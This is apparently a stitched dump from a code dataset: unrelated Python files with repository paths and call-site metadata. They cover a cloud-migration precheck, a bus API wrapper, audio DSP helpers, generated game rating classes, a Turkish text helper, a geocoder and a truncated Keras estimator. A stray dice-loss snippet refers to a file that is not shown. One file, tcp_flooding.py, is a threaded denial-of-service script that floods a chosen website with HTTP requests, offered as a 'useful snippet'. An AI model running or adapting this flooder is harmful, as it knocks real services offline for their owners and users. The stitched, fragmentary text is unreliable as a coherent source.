[((43, 26, 43, 68), 'torch.sort', 'torch.sort', (), '', False, 'import torch\n'), ((56, 8, 56, 42), 'torch.clamp', 'torch.clamp', (), '', False, 'import torch\n'), ((62, 11, 62, 30), 'torch.stack', 'torch.stack', ({(62, 23, 62, 29): 'losses'}, {}), '(losses)', False, 'import torch\n'), ((47, 21, 47, 42), 'torch.nn.functional.relu', 'F.relu', ({(47, 28, 47, 41): 'errors_sorted'}, {}), '(errors_sorted)', True, 'from torch.nn import functional as F\n'), ((47, 44, 47, 58), 'torch.autograd.Variable', 'Variable', ({(47, 53, 47, 57): 'grad'}, {}), '(grad)', False, 'from torch.autograd import Variable\n'), ((57, 8, 57, 20), 'torch.log', 'torch.log', ({(57, 18, 57, 19): 'x'}, {}), '(x)', False, 'import torch\n'), ((57, 23, 57, 39), 'torch.log', 'torch.log', ({(57, 33, 57, 38): '(1 - x)'}, {}), '(1 - x)', False, 'import torch\n'), ((42, 28, 42, 43), 'torch.autograd.Variable', 'Variable', ({(42, 37, 42, 42): 'signs'}, {}), '(signs)', False, 'from torch.autograd import Variable\n'), ((77, 50, 77, 83), 'torch.tensor', 'torch.tensor', ({(77, 63, 77, 82): '(soi + [soi[-1] * 2])'}, {}), '(soi + [soi[-1] * 2])', False, 'import torch\n'), ((79, 38, 79, 54), 'torch.zeros', 'torch.zeros', ({(79, 50, 79, 53): '[1]'}, {}), '([1])', False, 'import torch\n'), ((89, 26, 89, 84), 'torch.cat', 'torch.cat', ({(89, 36, 89, 83): '[per_im.gt_bitmasks for per_im in gt_instances]'}, {}), '([per_im.gt_bitmasks for per_im in gt_instances])', False, 'import torch\n'), ((128, 31, 128, 75), 'torch.sum', 'torch.sum', (), '', False, 'import torch\n')]
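A small worked example of the dice loss used in mask_pred.py above; dice_coefficient is restated here so the snippet runs standalone (PyTorch assumed to be installed):

import torch

def dice_loss(x, target, eps=1e-5):
    # same formula as dice_coefficient above: 1 - 2*intersection / (sum(x^2) + sum(t^2) + eps)
    x = x.reshape(x.size(0), -1)
    target = target.reshape(target.size(0), -1)
    intersection = (x * target).sum(dim=1)
    union = (x ** 2.0).sum(dim=1) + (target ** 2.0).sum(dim=1) + eps
    return 1. - 2 * intersection / union

pred = torch.tensor([[1., 1., 0., 0.]])  # two predicted foreground pixels
gt = torch.tensor([[1., 0., 0., 0.]])    # one true foreground pixel
print(dice_loss(pred, gt))               # ~0.33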
SVilgelm/CloudFerry
cloudferry/actions/prechecks/check_vmax_prerequisites.py
4459c0d21ba7ccffe51176932197b352e426ba63
# Copyright 2016 Mirantis Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import getpass import logging from cloudferry.lib.base import exception from cloudferry.lib.base.action import action from cloudferry.lib.utils import local from cloudferry.lib.utils import remote_runner LOG = logging.getLogger(__name__) class CheckVMAXPrerequisites(action.Action): """This verifies prerequisites required for NFS to VMAX iSCSI cinder volume migration""" def _iscsiadm_is_installed_locally(self): LOG.info("Checking if iscsiadm tool is installed") try: local.run('iscsiadm --help &>/dev/null') except local.LocalExecutionFailed: msg = ("iscsiadm is not available on the local host. Please " "install iscsiadm tool on the node you running on or " "choose other cinder backend for migration. iscsiadm is " "mandatory for migrations with EMC VMAX cinder backend") LOG.error(msg) raise exception.AbortMigrationError(msg) def _check_local_sudo_password_set(self): current_user = getpass.getuser() if current_user != 'root' and \ self.cfg.migrate.local_sudo_password is None: try: local.sudo('ls') except local.LocalExecutionFailed: msg = ("CloudFerry is running as '{user}' user, but " "passwordless sudo does not seem to be configured on " "current host. Please either specify password in " "`local_sudo_password` config option, or run " "CloudFerry as root user.").format(user=current_user) LOG.error(msg) raise exception.AbortMigrationError(msg) def _ssh_connectivity_between_controllers(self): src_host = self.cfg.src.ssh_host src_user = self.cfg.src.ssh_user dst_host = self.cfg.dst.ssh_host dst_user = self.cfg.dst.ssh_user LOG.info("Checking ssh connectivity between '%s' and '%s'", src_host, dst_host) rr = remote_runner.RemoteRunner(src_host, src_user) ssh_opts = ('-o UserKnownHostsFile=/dev/null ' '-o StrictHostKeyChecking=no') cmd = "ssh {opts} {user}@{host} 'echo ok'".format(opts=ssh_opts, user=dst_user, host=dst_host) try: rr.run(cmd) except remote_runner.RemoteExecutionError: msg = ("No ssh connectivity between source host '{src_host}' and " "destination host '{dst_host}'. Make sure you have keys " "and correct configuration on these nodes. To verify run " "'{ssh_cmd}' from '{src_host}' node") msg = msg.format(src_host=src_host, dst_host=dst_host, ssh_cmd=cmd) LOG.error(msg) raise exception.AbortMigrationError(msg) def run(self, **kwargs): if self.cfg.dst_storage.backend != 'iscsi-vmax': return self._iscsiadm_is_installed_locally() self._ssh_connectivity_between_controllers() self._check_local_sudo_password_set()
[((23, 6, 23, 33), 'logging.getLogger', 'logging.getLogger', ({(23, 24, 23, 32): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((43, 23, 43, 40), 'getpass.getuser', 'getpass.getuser', ({}, {}), '()', False, 'import getpass\n'), ((66, 13, 66, 59), 'cloudferry.lib.utils.remote_runner.RemoteRunner', 'remote_runner.RemoteRunner', ({(66, 40, 66, 48): 'src_host', (66, 50, 66, 58): 'src_user'}, {}), '(src_host, src_user)', False, 'from cloudferry.lib.utils import remote_runner\n'), ((33, 12, 33, 52), 'cloudferry.lib.utils.local.run', 'local.run', ({(33, 22, 33, 51): '"""iscsiadm --help &>/dev/null"""'}, {}), "('iscsiadm --help &>/dev/null')", False, 'from cloudferry.lib.utils import local\n'), ((40, 18, 40, 52), 'cloudferry.lib.base.exception.AbortMigrationError', 'exception.AbortMigrationError', ({(40, 48, 40, 51): 'msg'}, {}), '(msg)', False, 'from cloudferry.lib.base import exception\n'), ((47, 16, 47, 32), 'cloudferry.lib.utils.local.sudo', 'local.sudo', ({(47, 27, 47, 31): '"""ls"""'}, {}), "('ls')", False, 'from cloudferry.lib.utils import local\n'), ((84, 18, 84, 52), 'cloudferry.lib.base.exception.AbortMigrationError', 'exception.AbortMigrationError', ({(84, 48, 84, 51): 'msg'}, {}), '(msg)', False, 'from cloudferry.lib.base import exception\n'), ((55, 22, 55, 56), 'cloudferry.lib.base.exception.AbortMigrationError', 'exception.AbortMigrationError', ({(55, 52, 55, 55): 'msg'}, {}), '(msg)', False, 'from cloudferry.lib.base import exception\n')]
codeforamerica/bongo
bongo/core.py
a1b162c54fc51630ae1cfac16e1c136b0ff320a3
""" A simple wrapper for the Bongo Iowa City bus API. """ import requests as req class Bongo(object): """ A simple Python wrapper for the Bongo Iowa City bus API. """ def __init__(self, format='json'): self.format = format def get(self, endpoint, **kwargs): """Perform a HTTP GET request to the API and return the data.""" if 'format' not in kwargs: kwargs['format'] = self.format url = "http://ebongo.org/api/%s" % (endpoint) response = req.get(url, params=kwargs) return self.convert(response) def convert(self, response): """Convert a request based on the response type.""" content_type = response.headers['content-type'] if content_type == 'application/json': data = response.json elif 'stoplist' in response.url: # The `stoplist` endpoint insists that it's HTML. data = response.json else: data = response.content return data def route(self, tag=None, agency=None, **kwargs): """ Get information on a specific route, or all route listings. >>> Bongo().route('lantern', 'coralville') {"coralville's": {"lantern": "route"}} """ if agency and tag: endpoint = 'route' kwargs['agency'] = agency kwargs['route'] = tag else: endpoint = 'routelist' return self.get(endpoint, **kwargs) def routes(self): """ Same as an empty call to the `route` method. >>> Bongo().routes() {"routes": [1234, 5678, 9999]} """ return self.route() def stop(self, number=None, **kwargs): """ Retrieve information specific to a given stop number. >>> Bongo().stop(8350) {"stop": {"8350": "information"}} """ if number: endpoint = 'stop' kwargs['stopid'] = number else: endpoint = 'stoplist' return self.get(endpoint, **kwargs) def stops(self): """ Same as an empty call to the `stop` method. >>> Bongo().stops() {"stops": [1234, 5678, 9999]} """ return self.stop() def predict(self, number, **kwargs): """ Predict the bus arrival times for a specific stop. >>> Bongo().predict(8350) {"stop": {"8350": "prediction"}} """ endpoint = 'prediction' kwargs['stopid'] = number return self.get(endpoint, **kwargs)
[((21, 19, 21, 46), 'requests.get', 'req.get', (), '', True, 'import requests as req\n')]
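Hypothetical usage of the Bongo wrapper above. It assumes the class is importable and ebongo.org is reachable; the response layouts shown in the docstrings are placeholders, so treat this as a sketch rather than guaranteed output:

bongo = Bongo(format='json')
routes = bongo.routes()         # GET http://ebongo.org/api/routelist?format=json
stop_info = bongo.stop(8350)    # GET http://ebongo.org/api/stop?stopid=8350&format=json
arrivals = bongo.predict(8350)  # GET http://ebongo.org/api/prediction?stopid=8350&format=json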
janaSunrise/useful-python-snippets
src/security/tcp_flooding.py
f03285b8f0b44f87326ca982129dab80a18697f5
import random import socket import string import sys import threading import time def attack(host: str, port: int = 80, request_count: int = 10 ** 10) -> None: # Threading support thread_num = 0 thread_num_mutex = threading.Lock() # Utility function def print_status() -> None: global thread_num thread_num_mutex.acquire(True) thread_num += 1 print(f"\n[{time.ctime().split(' ')[3]}] [{str(thread_num)}] Under progress...") thread_num_mutex.release() def generate_url_path(): msg = str(string.ascii_letters + string.digits + string.punctuation) data = "".join(random.sample(msg, 5)) return data def attack_() -> None: print_status() url_path = generate_url_path() dos = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: dos.connect((ip, port)) msg = f"GET /{url_path} HTTP/1.1\nHost: {host}\n\n" dos.send(msg.encode()) except socket.error: print(f"[ERROR] Site may be down | {socket.error}") finally: dos.shutdown(socket.SHUT_RDWR) dos.close() try: host = host.replace("https://", "").replace("http://", "").replace("www.", "") ip = socket.gethostbyname(host) except socket.gaierror: print("[ERROR] Make sure you entered a correct website!") sys.exit(2) all_threads = [] for i in range(request_count): t1 = threading.Thread(target=attack) t1.start() all_threads.append(t1) time.sleep(0.01) for current_thread in all_threads: current_thread.join()
[((12, 23, 12, 39), 'threading.Lock', 'threading.Lock', ({}, {}), '()', False, 'import threading\n'), ((33, 14, 33, 63), 'socket.socket', 'socket.socket', ({(33, 28, 33, 42): 'socket.AF_INET', (33, 44, 33, 62): 'socket.SOCK_STREAM'}, {}), '(socket.AF_INET, socket.SOCK_STREAM)', False, 'import socket\n'), ((48, 13, 48, 39), 'socket.gethostbyname', 'socket.gethostbyname', ({(48, 34, 48, 38): 'host'}, {}), '(host)', False, 'import socket\n'), ((56, 13, 56, 44), 'threading.Thread', 'threading.Thread', (), '', False, 'import threading\n'), ((60, 8, 60, 24), 'time.sleep', 'time.sleep', ({(60, 19, 60, 23): '(0.01)'}, {}), '(0.01)', False, 'import time\n'), ((26, 23, 26, 44), 'random.sample', 'random.sample', ({(26, 37, 26, 40): 'msg', (26, 42, 26, 43): '5'}, {}), '(msg, 5)', False, 'import random\n'), ((51, 8, 51, 19), 'sys.exit', 'sys.exit', ({(51, 17, 51, 18): '(2)'}, {}), '(2)', False, 'import sys\n'), ((20, 20, 20, 32), 'time.ctime', 'time.ctime', ({}, {}), '()', False, 'import time\n')]
yuvalot/ml_final_project
src/ml_final_project/utils/evaluators/default.py
fefb67c92504ceeb7999e49daa8a8aa5a60f1c61
def default_evaluator(model, X_test, y_test): """A simple evaluator that takes in a model, and a test set, and returns the loss. Args: model: The model to evaluate. X_test: The features matrix of the test set. y_test: The one-hot labels matrix of the test set. Returns: The loss on the test set. """ return model.evaluate(X_test, y_test, verbose=0)[0]
[]
wangjm12138/Yolov3_wang
test.py
3d143c7cd863dec796edede3faedacc6590cab5e
import random class Yolov3(object): def __init__(self): self.num=0 self.input_size=[8,16,32] def __iter__(self): return self def __next__(self): a = random.choice(self.input_size) self.num=self.num+1 if self.num<3: return a else: raise StopIteration yolo=Yolov3() for data in yolo: print(data)
[((10, 6, 10, 36), 'random.choice', 'random.choice', ({(10, 20, 10, 35): 'self.input_size'}, {}), '(self.input_size)', False, 'import random\n')]
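The test script above exercises the iterator protocol by hand (__iter__/__next__ plus an explicit StopIteration after two items). An equivalent generator-based sketch, not taken from the repository:

import random

def random_sizes(sizes=(8, 16, 32), count=2):
    # yields 'count' random input sizes, mirroring Yolov3.__next__ above
    for _ in range(count):
        yield random.choice(sizes)

for size in random_sizes():
    print(size)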
huchenxucs/WaveRNN
utils/dsp.py
6d5805d54b8a3db99aa190083b550236f2c15d28
import math import numpy as np import librosa from utils import hparams as hp from scipy.signal import lfilter import soundfile as sf def label_2_float(x, bits): return 2 * x / (2**bits - 1.) - 1. def float_2_label(x, bits): assert abs(x).max() <= 1.0 x = (x + 1.) * (2**bits - 1) / 2 return x.clip(0, 2**bits - 1) def load_wav(path): return librosa.load(path, sr=hp.sample_rate)[0] def save_wav(x, path): # librosa.output.write_wav(path, x.astype(np.float32), sr=hp.sample_rate) sf.write(path, x.astype(np.float32), samplerate=hp.sample_rate) def split_signal(x): unsigned = x + 2**15 coarse = unsigned // 256 fine = unsigned % 256 return coarse, fine def combine_signal(coarse, fine): return coarse * 256 + fine - 2**15 def encode_16bits(x): return np.clip(x * 2**15, -2**15, 2**15 - 1).astype(np.int16) def linear_to_mel(spectrogram): return librosa.feature.melspectrogram( S=spectrogram, sr=hp.sample_rate, n_fft=hp.n_fft, n_mels=hp.num_mels, fmin=hp.fmin) ''' def build_mel_basis(): return librosa.filters.mel(hp.sample_rate, hp.n_fft, n_mels=hp.num_mels, fmin=hp.fmin) ''' def normalize(S): return np.clip((S - hp.min_level_db) / -hp.min_level_db, 0, 1) def denormalize(S): return (np.clip(S, 0, 1) * -hp.min_level_db) + hp.min_level_db def amp_to_db(x): return 20 * np.log10(np.maximum(1e-5, x)) def db_to_amp(x): return np.power(10.0, x * 0.05) def spectrogram(y): D = stft(y) S = amp_to_db(np.abs(D)) - hp.ref_level_db return normalize(S) def melspectrogram(y): D = stft(y) S = amp_to_db(linear_to_mel(np.abs(D))) return normalize(S) def stft(y): return librosa.stft( y=y, n_fft=hp.n_fft, hop_length=hp.hop_length, win_length=hp.win_length) def pre_emphasis(x): return lfilter([1, -hp.preemphasis], [1], x) def de_emphasis(x): return lfilter([1], [1, -hp.preemphasis], x) def encode_mu_law(x, mu): mu = mu - 1 fx = np.sign(x) * np.log(1 + mu * np.abs(x)) / np.log(1 + mu) return np.floor((fx + 1) / 2 * mu + 0.5) def decode_mu_law(y, mu, from_labels=True): # TODO: get rid of log2 - makes no sense if from_labels: y = label_2_float(y, math.log2(mu)) mu = mu - 1 x = np.sign(y) / mu * ((1 + mu) ** np.abs(y) - 1) return x def reconstruct_waveform(mel, n_iter=32): """Uses Griffin-Lim phase reconstruction to convert from a normalized mel spectrogram back into a waveform.""" denormalized = denormalize(mel) amp_mel = db_to_amp(denormalized) S = librosa.feature.inverse.mel_to_stft( amp_mel, power=1, sr=hp.sample_rate, n_fft=hp.n_fft, fmin=hp.fmin) wav = librosa.core.griffinlim( S, n_iter=n_iter, hop_length=hp.hop_length, win_length=hp.win_length) return wav
[((43, 11, 44, 91), 'librosa.feature.melspectrogram', 'librosa.feature.melspectrogram', (), '', False, 'import librosa\n'), ((52, 11, 52, 66), 'numpy.clip', 'np.clip', ({(52, 19, 52, 59): '((S - hp.min_level_db) / -hp.min_level_db)', (52, 61, 52, 62): '(0)', (52, 64, 52, 65): '(1)'}, {}), '((S - hp.min_level_db) / -hp.min_level_db, 0, 1)', True, 'import numpy as np\n'), ((64, 11, 64, 35), 'numpy.power', 'np.power', ({(64, 20, 64, 24): '(10.0)', (64, 26, 64, 34): '(x * 0.05)'}, {}), '(10.0, x * 0.05)', True, 'import numpy as np\n'), ((80, 11, 82, 75), 'librosa.stft', 'librosa.stft', (), '', False, 'import librosa\n'), ((86, 11, 86, 48), 'scipy.signal.lfilter', 'lfilter', ({(86, 19, 86, 39): '[1, -hp.preemphasis]', (86, 41, 86, 44): '[1]', (86, 46, 86, 47): 'x'}, {}), '([1, -hp.preemphasis], [1], x)', False, 'from scipy.signal import lfilter\n'), ((90, 11, 90, 48), 'scipy.signal.lfilter', 'lfilter', ({(90, 19, 90, 22): '[1]', (90, 24, 90, 44): '[1, -hp.preemphasis]', (90, 46, 90, 47): 'x'}, {}), '([1], [1, -hp.preemphasis], x)', False, 'from scipy.signal import lfilter\n'), ((96, 11, 96, 44), 'numpy.floor', 'np.floor', ({(96, 20, 96, 43): '((fx + 1) / 2 * mu + 0.5)'}, {}), '((fx + 1) / 2 * mu + 0.5)', True, 'import numpy as np\n'), ((111, 8, 113, 37), 'librosa.feature.inverse.mel_to_stft', 'librosa.feature.inverse.mel_to_stft', (), '', False, 'import librosa\n'), ((114, 10, 116, 59), 'librosa.core.griffinlim', 'librosa.core.griffinlim', (), '', False, 'import librosa\n'), ((20, 11, 20, 48), 'librosa.load', 'librosa.load', (), '', False, 'import librosa\n'), ((95, 51, 95, 65), 'numpy.log', 'np.log', ({(95, 58, 95, 64): '(1 + mu)'}, {}), '(1 + mu)', True, 'import numpy as np\n'), ((39, 11, 39, 48), 'numpy.clip', 'np.clip', ({(39, 19, 39, 28): '(x * 2 ** 15)', (39, 30, 39, 36): '(-2 ** 15)', (39, 38, 39, 47): '(2 ** 15 - 1)'}, {}), '(x * 2 ** 15, -2 ** 15, 2 ** 15 - 1)', True, 'import numpy as np\n'), ((56, 12, 56, 28), 'numpy.clip', 'np.clip', ({(56, 20, 56, 21): 'S', (56, 23, 56, 24): '(0)', (56, 26, 56, 27): '(1)'}, {}), '(S, 0, 1)', True, 'import numpy as np\n'), ((60, 25, 60, 44), 'numpy.maximum', 'np.maximum', ({(60, 36, 60, 40): '(1e-05)', (60, 42, 60, 43): 'x'}, {}), '(1e-05, x)', True, 'import numpy as np\n'), ((69, 18, 69, 27), 'numpy.abs', 'np.abs', ({(69, 25, 69, 26): 'D'}, {}), '(D)', True, 'import numpy as np\n'), ((75, 32, 75, 41), 'numpy.abs', 'np.abs', ({(75, 39, 75, 40): 'D'}, {}), '(D)', True, 'import numpy as np\n'), ((95, 9, 95, 19), 'numpy.sign', 'np.sign', ({(95, 17, 95, 18): 'x'}, {}), '(x)', True, 'import numpy as np\n'), ((101, 41, 101, 54), 'math.log2', 'math.log2', ({(101, 51, 101, 53): 'mu'}, {}), '(mu)', False, 'import math\n'), ((103, 8, 103, 18), 'numpy.sign', 'np.sign', ({(103, 16, 103, 17): 'y'}, {}), '(y)', True, 'import numpy as np\n'), ((103, 39, 103, 48), 'numpy.abs', 'np.abs', ({(103, 46, 103, 47): 'y'}, {}), '(y)', True, 'import numpy as np\n'), ((95, 38, 95, 47), 'numpy.abs', 'np.abs', ({(95, 45, 95, 46): 'x'}, {}), '(x)', True, 'import numpy as np\n')]
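The mu-law companding used by encode_mu_law/decode_mu_law in dsp.py above can be exercised without the project's hparams module; the sketch below restates both formulas with plain NumPy and assumes 256 quantisation levels:

import numpy as np

def encode_mu_law(x, mu=256):
    mu -= 1
    fx = np.sign(x) * np.log1p(mu * np.abs(x)) / np.log1p(mu)
    return np.floor((fx + 1) / 2 * mu + 0.5)  # integer labels in [0, mu]

def decode_mu_law(y, mu=256):
    y = 2 * y / (mu - 1) - 1                   # labels back to [-1, 1]
    mu -= 1
    return np.sign(y) / mu * ((1 + mu) ** np.abs(y) - 1)

x = np.linspace(-1, 1, 5)
labels = encode_mu_law(x)
print(labels)                 # quantised labels in [0, 255]
print(decode_mu_law(labels))  # approximately recovers x, up to quantisation error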
koliupy/loldib
loldib/getratings/models/NA/na_talon/na_talon_jng.py
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
from getratings.models.ratings import Ratings class NA_Talon_Jng_Aatrox(Ratings): pass class NA_Talon_Jng_Ahri(Ratings): pass class NA_Talon_Jng_Akali(Ratings): pass class NA_Talon_Jng_Alistar(Ratings): pass class NA_Talon_Jng_Amumu(Ratings): pass class NA_Talon_Jng_Anivia(Ratings): pass class NA_Talon_Jng_Annie(Ratings): pass class NA_Talon_Jng_Ashe(Ratings): pass class NA_Talon_Jng_AurelionSol(Ratings): pass class NA_Talon_Jng_Azir(Ratings): pass class NA_Talon_Jng_Bard(Ratings): pass class NA_Talon_Jng_Blitzcrank(Ratings): pass class NA_Talon_Jng_Brand(Ratings): pass class NA_Talon_Jng_Braum(Ratings): pass class NA_Talon_Jng_Caitlyn(Ratings): pass class NA_Talon_Jng_Camille(Ratings): pass class NA_Talon_Jng_Cassiopeia(Ratings): pass class NA_Talon_Jng_Chogath(Ratings): pass class NA_Talon_Jng_Corki(Ratings): pass class NA_Talon_Jng_Darius(Ratings): pass class NA_Talon_Jng_Diana(Ratings): pass class NA_Talon_Jng_Draven(Ratings): pass class NA_Talon_Jng_DrMundo(Ratings): pass class NA_Talon_Jng_Ekko(Ratings): pass class NA_Talon_Jng_Elise(Ratings): pass class NA_Talon_Jng_Evelynn(Ratings): pass class NA_Talon_Jng_Ezreal(Ratings): pass class NA_Talon_Jng_Fiddlesticks(Ratings): pass class NA_Talon_Jng_Fiora(Ratings): pass class NA_Talon_Jng_Fizz(Ratings): pass class NA_Talon_Jng_Galio(Ratings): pass class NA_Talon_Jng_Gangplank(Ratings): pass class NA_Talon_Jng_Garen(Ratings): pass class NA_Talon_Jng_Gnar(Ratings): pass class NA_Talon_Jng_Gragas(Ratings): pass class NA_Talon_Jng_Graves(Ratings): pass class NA_Talon_Jng_Hecarim(Ratings): pass class NA_Talon_Jng_Heimerdinger(Ratings): pass class NA_Talon_Jng_Illaoi(Ratings): pass class NA_Talon_Jng_Irelia(Ratings): pass class NA_Talon_Jng_Ivern(Ratings): pass class NA_Talon_Jng_Janna(Ratings): pass class NA_Talon_Jng_JarvanIV(Ratings): pass class NA_Talon_Jng_Jax(Ratings): pass class NA_Talon_Jng_Jayce(Ratings): pass class NA_Talon_Jng_Jhin(Ratings): pass class NA_Talon_Jng_Jinx(Ratings): pass class NA_Talon_Jng_Kalista(Ratings): pass class NA_Talon_Jng_Karma(Ratings): pass class NA_Talon_Jng_Karthus(Ratings): pass class NA_Talon_Jng_Kassadin(Ratings): pass class NA_Talon_Jng_Katarina(Ratings): pass class NA_Talon_Jng_Kayle(Ratings): pass class NA_Talon_Jng_Kayn(Ratings): pass class NA_Talon_Jng_Kennen(Ratings): pass class NA_Talon_Jng_Khazix(Ratings): pass class NA_Talon_Jng_Kindred(Ratings): pass class NA_Talon_Jng_Kled(Ratings): pass class NA_Talon_Jng_KogMaw(Ratings): pass class NA_Talon_Jng_Leblanc(Ratings): pass class NA_Talon_Jng_LeeSin(Ratings): pass class NA_Talon_Jng_Leona(Ratings): pass class NA_Talon_Jng_Lissandra(Ratings): pass class NA_Talon_Jng_Lucian(Ratings): pass class NA_Talon_Jng_Lulu(Ratings): pass class NA_Talon_Jng_Lux(Ratings): pass class NA_Talon_Jng_Malphite(Ratings): pass class NA_Talon_Jng_Malzahar(Ratings): pass class NA_Talon_Jng_Maokai(Ratings): pass class NA_Talon_Jng_MasterYi(Ratings): pass class NA_Talon_Jng_MissFortune(Ratings): pass class NA_Talon_Jng_MonkeyKing(Ratings): pass class NA_Talon_Jng_Mordekaiser(Ratings): pass class NA_Talon_Jng_Morgana(Ratings): pass class NA_Talon_Jng_Nami(Ratings): pass class NA_Talon_Jng_Nasus(Ratings): pass class NA_Talon_Jng_Nautilus(Ratings): pass class NA_Talon_Jng_Nidalee(Ratings): pass class NA_Talon_Jng_Nocturne(Ratings): pass class NA_Talon_Jng_Nunu(Ratings): pass class NA_Talon_Jng_Olaf(Ratings): pass class NA_Talon_Jng_Orianna(Ratings): pass class NA_Talon_Jng_Ornn(Ratings): pass class NA_Talon_Jng_Pantheon(Ratings): pass class NA_Talon_Jng_Poppy(Ratings): pass 
class NA_Talon_Jng_Quinn(Ratings): pass class NA_Talon_Jng_Rakan(Ratings): pass class NA_Talon_Jng_Rammus(Ratings): pass class NA_Talon_Jng_RekSai(Ratings): pass class NA_Talon_Jng_Renekton(Ratings): pass class NA_Talon_Jng_Rengar(Ratings): pass class NA_Talon_Jng_Riven(Ratings): pass class NA_Talon_Jng_Rumble(Ratings): pass class NA_Talon_Jng_Ryze(Ratings): pass class NA_Talon_Jng_Sejuani(Ratings): pass class NA_Talon_Jng_Shaco(Ratings): pass class NA_Talon_Jng_Shen(Ratings): pass class NA_Talon_Jng_Shyvana(Ratings): pass class NA_Talon_Jng_Singed(Ratings): pass class NA_Talon_Jng_Sion(Ratings): pass class NA_Talon_Jng_Sivir(Ratings): pass class NA_Talon_Jng_Skarner(Ratings): pass class NA_Talon_Jng_Sona(Ratings): pass class NA_Talon_Jng_Soraka(Ratings): pass class NA_Talon_Jng_Swain(Ratings): pass class NA_Talon_Jng_Syndra(Ratings): pass class NA_Talon_Jng_TahmKench(Ratings): pass class NA_Talon_Jng_Taliyah(Ratings): pass class NA_Talon_Jng_Talon(Ratings): pass class NA_Talon_Jng_Taric(Ratings): pass class NA_Talon_Jng_Teemo(Ratings): pass class NA_Talon_Jng_Thresh(Ratings): pass class NA_Talon_Jng_Tristana(Ratings): pass class NA_Talon_Jng_Trundle(Ratings): pass class NA_Talon_Jng_Tryndamere(Ratings): pass class NA_Talon_Jng_TwistedFate(Ratings): pass class NA_Talon_Jng_Twitch(Ratings): pass class NA_Talon_Jng_Udyr(Ratings): pass class NA_Talon_Jng_Urgot(Ratings): pass class NA_Talon_Jng_Varus(Ratings): pass class NA_Talon_Jng_Vayne(Ratings): pass class NA_Talon_Jng_Veigar(Ratings): pass class NA_Talon_Jng_Velkoz(Ratings): pass class NA_Talon_Jng_Vi(Ratings): pass class NA_Talon_Jng_Viktor(Ratings): pass class NA_Talon_Jng_Vladimir(Ratings): pass class NA_Talon_Jng_Volibear(Ratings): pass class NA_Talon_Jng_Warwick(Ratings): pass class NA_Talon_Jng_Xayah(Ratings): pass class NA_Talon_Jng_Xerath(Ratings): pass class NA_Talon_Jng_XinZhao(Ratings): pass class NA_Talon_Jng_Yasuo(Ratings): pass class NA_Talon_Jng_Yorick(Ratings): pass class NA_Talon_Jng_Zac(Ratings): pass class NA_Talon_Jng_Zed(Ratings): pass class NA_Talon_Jng_Ziggs(Ratings): pass class NA_Talon_Jng_Zilean(Ratings): pass class NA_Talon_Jng_Zyra(Ratings): pass
[]
derenyilmaz/personality-analysis-framework
utils/turkish.py
9e1f3ac1047b1df07498159de23f88f87644d195
class TurkishText():
    """Class for handling lowercase/uppercase conversions of Turkish characters.

    Attributes:
        text -- Turkish text to be handled
    """

    text = ""
    l = ['ı', 'ğ', 'ü', 'ş', 'i', 'ö', 'ç']
    u = ['I', 'Ğ', 'Ü', 'Ş', 'İ', 'Ö', 'Ç']

    def __init__(self, text):
        self.text = text

    def upper(self):
        """Converts the text into uppercase letters. Returns string."""
        res = ""
        for i in self.text:
            if i in self.l:
                res += self.u[self.l.index(i)]
            else:
                res += i.upper()
        return res

    def lower(self):
        """Converts the text into lowercase letters. Returns string."""
        res = ""
        for i in self.text:
            if i in self.u:
                res += self.l[self.u.index(i)]
            else:
                res += i.lower()
        return res

    def capitalize(self):
        """Converts each first letter to uppercase, and the rest to lowercase letters. Returns string."""
        m = self.text.split()
        res = ""
        for i in m:
            res += TurkishText(i[0]).upper() + TurkishText(i[1:]).lower() + " "
        return res[:-1:]
[]
Soumya117/finnazureflaskapp
app/helpers/geocode.py
794f82596a329ff1a2e4dc23d49903a0ef474f95
import googlemaps

gmaps = googlemaps.Client(key='google_key')


def get_markers(address):
    geocode_result = gmaps.geocode(address)
    return geocode_result[0]['geometry']['location']
[((3, 8, 3, 43), 'googlemaps.Client', 'googlemaps.Client', (), '', False, 'import googlemaps\n')]
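A short usage sketch for the geocode helper above; the address and the printed keys are illustrative only, the import path is assumed from the repo layout, and the lat/lng dict shape follows the geocode_result[0]['geometry']['location'] access used in get_markers.

# Illustrative only: requires a valid Google Maps API key in the Client above.
from app.helpers.geocode import get_markers  # import path assumed from repo layout

location = get_markers("1600 Amphitheatre Parkway, Mountain View, CA")
# get_markers returns the nested location dict, e.g. {'lat': 37.42, 'lng': -122.08}
print(location['lat'], location['lng'])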
aspratyush/dl_utils
tf/estimators/keras_estimator.py
c067831f3c72aba88223c231c7fbc249d997e222
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

# Imports
import os
import numpy as np
import tensorflow as tf


def run(model, X, Y, optimizer=None, nb_epochs=30, nb_batches=128):
    """
    Run the estimator
    """
    if optimizer is None:
        optimizer = tf.keras.optimizers.SGD(
            lr=0.0009, decay=1e-5, momentum=0.9, nesterov=True)

    # 1. Compile the model
    model.compile(
        optimizer=optimizer,
        loss='categorical_crossentropy',
        metrics=['accuracy'])

    # 2. Create an estimator
    model_est = tf.keras.estimator.model_to_estimator(
        keras_model=model, model_dir='./lenet')

    # Training
    # 3a. Create the training function
    train_input_fn = tf.estimator.inputs.numpy_input_fn(
        x={model.input_names[0]: X['train'].astype(np.float32)},
        y=Y['train'].astype(np.float32),
        batch_size=nb_batches,
        num_epochs=nb_epochs,
        shuffle=True
    )

    # 3b. Train the model
    model_est.train(input_fn=train_input_fn, steps=nb_epochs*nb_batches)

    # Evaluate
    # 4a. Create the evaluation input function
    eval_input_fn = tf.estimator.inputs.numpy_input_fn(
        x={model.input_names[0]: X['test'].astype(np.float32)},
        y=Y['test'].astype(np.float32),
        batch_size=nb_batches,
        num_epochs=nb_epochs,
        shuffle=True
    )

    # 4b. Evaluate the model
    model_eval = model_est.evaluate(input_fn=eval_input_fn)
    print(model_eval)

    return model_est, model_eval


def run_from_generator(
        model, input_func=None, input_func_dict=None,
        eval_func_dict=None, nb_epochs=10, optimizer=None,
        model_dir=None):
    """
    Overloaded function to create an estimator using tf.data.Dataset
    :param model : uncompiled keras model
    :param input_fn : input function providing tf.data.Dataset to the estimator
    :param input_fn_dict : dictionary containing input params for input_fn
